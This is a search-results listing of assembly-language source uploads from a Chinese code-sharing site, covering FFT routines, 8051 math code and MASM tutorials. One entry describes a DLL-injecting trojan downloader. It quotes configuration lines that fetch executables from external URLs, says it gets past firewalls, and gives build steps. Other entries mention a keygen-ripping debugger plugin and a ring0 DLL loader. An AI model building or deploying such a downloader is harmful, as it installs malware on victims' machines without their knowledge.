Location:
Search - asm too
Search list
Description: 利用汇编语言和TMS320F2812芯片实现FFT的算法,该算法对128点和256点很有效,使用过程中要考虑信号值不能太小-use of assembly language and TMS320F2812 chip FFT algorithm for 128 points and 256 points very effective, the process used to be considered too small signal value can not
Platform: |
Size: 1099 |
Author: 王乾坤 |
Hits:
Description: MCS51单片机数学计算汇编子和序,调试过。编译环境为ASM51,适应各种51单片机!-MCS51 mathematical calculations and son sequence compilation, debugging too. Calling for the build environment, adapt to 51 microcontroller!
Platform: |
Size: 1024 |
Author: 张明 |
Hits:
Description: 利用汇编语言和TMS320F2812芯片实现FFT的算法,该算法对128点和256点很有效,使用过程中要考虑信号值不能太小-use of assembly language and TMS320F2812 chip FFT algorithm for 128 points and 256 points very effective, the process used to be considered too small signal value can not
Platform: |
Size: 1024 |
Author: 王乾坤 |
Hits:
Description: 世界程序设计大赛一等奖作品,不多说了,自己看看吧,太牛了-Programming Contest World Class works, nothing to add to that, you could see for himself, too Niu a
Platform: |
Size: 6144 |
Author: 冢冢 |
Hits:
Description: 绝对有用的olly插件。在asm里跟踪到了关键call,但里面的函数太太太复杂,完全无法分析,要做注册机必须实现其算法。怎么办?全部ripper出来!跳转等都自动帮你设好了标签。赞!-Olly absolutely useful plug-ins. Asm-ri in track at a crucial call, but his wife inside a function is too complex to analyze completely unable to do Zhuceji must realize its algorithm. How do? All ripper out! Jump are automatically set up to help you better tag. Chan!
Platform: |
Size: 43008 |
Author: evilight |
Hits:
Description: 微型51/AVR编程器由德国的Peter Dannegger设计的51编程器,无论是学习单片机或业余时间搞开发,都是一个非常好的选择。但在原设计的的PC程序中很可惜的只有DOS版本的。为此我为它写了一个Windows版本的配套软件,经过一些朋友的试用效果也不错。以下图一是软件的界面。现有英文版和简体中文版,支持win9x,winxp,winnt,win2k多种版本的OS系统。 软件使用简单无须太多的说明,同时支持HEX,BIN等文件格式的读取,绿色软件无须安装。
可以到http://www.specs.de/~danni/tools/proflash/index.htm下载-Micro-51/AVR programmer from Germany, designed by Peter Dannegger programmer 51, whether it is free time to study or engage in the development of single-chip are a very good option. However, in the original design process of the PC it is a pity that only the DOS version. For this reason I write it, a Windows version of the software, after the trial some of my friends have a good effect. First, the following chart of the interface software. Available in English and simplified Chinese version, support for win9x, winxp, winnt, win2k multiple versions of the OS system. Using a simple software that do not have too much at the same time support the HEX, BIN file formats, such as reading, green do not need to install software. Can http://www.specs.de/ ~ danni/tools/proflash/index.htm to download
Platform: |
Size: 1682432 |
Author: laky |
Hits:
Description: 汇编语言编程和调试工具。
学习汇编语言的目的就是要用汇编语言编程来解决实际问题,下面介绍二种常用的汇编语言编程环境:宏汇编MASM 6.11和Turbo Assember 5.0。
1.1、宏汇编MASM系统
在宏汇编MASM系统中,程序员可用二种方法来处理源程序:命令行和集成环境。
-Assembly language programming and debugging tools. The purpose of learning assembly language is to use assembly language programming to solve practical problems, the following describes two kinds of commonly used assembly language programming environment: Macro Assembler MASM 6.11 and Turbo Assember 5.0. 1.1, Macro Assembler MASM Macro Assembler MASM system in the system the programmer can be two kinds of ways to deal with source code: The command line and integrated environment.
Platform: |
Size: 792576 |
Author: 草原IT人 |
Hits:
Description: 编译说明:{
程序采用DLL插入--9x 和NT下都可以插入
穿防火墙,可以自定义三条连接
后面两个还可以休眠5秒后运行--具体看代码
程序编译压缩后只有2.7k
}
首先打开dlldownloader.asm文件~
url1s byte http://www.Anskya.Net/1.exe , 0
url2s byte http://www.Anskya.Net/2.exe , 0
url3s byte http://www.Anskya.Net/2.exe , 0
修改以上三个连接
exe1s byte heart1.exe , 0
exe2s byte heart2.exe , 0
exe3s byte heart3.exe , 0
这三个是保存的文件名--只需要填写文件名就可以了~~文件默认保存在临时文件目录
然后保存代码运行makeDLL.bat
然后直接运行makeEXE.bat
如果需要修改插入进程的话~修改
szExplorer byte Shell_TrayWnd , 0
中的类名----例如 QQ的窗口类名就是#32770
修改好以后就可以保存了~
然后运行makeEXE.bat就可以编译出来了
差点忘记~一定要装MASM32哦~~最好是V8.2-Compile Description: (sorry too lazy to paint Synthesizer)
(
Procedure used DLL insertion- 9x and NT can be inserted under all
Wear a firewall, you can customize the three connections
The latter two can also be sleep after 5 seconds to run- specifically look at the code
Program compiled compressed only 2.7k
)
First, open the file ~ dlldownloader.asm
url1s byte http://www.Anskya.Net/1.exe , 0
url2s byte http://www.Anskya.Net/2.exe , 0
url3s byte http://www.Anskya.Net/2.exe , 0
Modify the above three connections
exe1s byte heart1.exe , 0
exe2s byte heart2.exe , 0
exe3s byte heart3.exe , 0
These three are saved in the file name- just need to fill in the file name can be a ~ ~ the file by default saved in the temporary file directory
And then save the code to run makeDLL.bat
And then run directly makeEXE.bat
If you need to modify the insertion process, if ~ changes
szExplorer byte Shell_TrayWnd , 0
For example, the class name---- QQ
Platform: |
Size: 29696 |
Author: 张启航 |
Hits:
Description: 汇编指令大全,十分全面得参考汇编,对于ASM程序员来说,是很好的字典。-Assembly instructions Daquan, very comprehensive compendium of references too, for ASM programmers, is a good dictionary.
Platform: |
Size: 2048 |
Author: Mpi |
Hits:
Description: Stepper Motor circuit using ATmega16
this package includes DSN (Proteus Design File), C code as main, ASM (some sources included), and the hex file too.
Platform: |
Size: 36864 |
Author: Al1 |
Hits:
Description: 使用Visual C++嵌入汇编语言的方式,实现DES。-Implement the DES cipher by C++ which embedded with ASM to make the algorithm more fast. And use some skills to improve the efficiency, too.
Platform: |
Size: 8192 |
Author: gsy |
Hits:
Description: The asm is to loader a ring3 dll from ring0,i think good!hope you too!
Platform: |
Size: 9216 |
Author: loving |
Hits: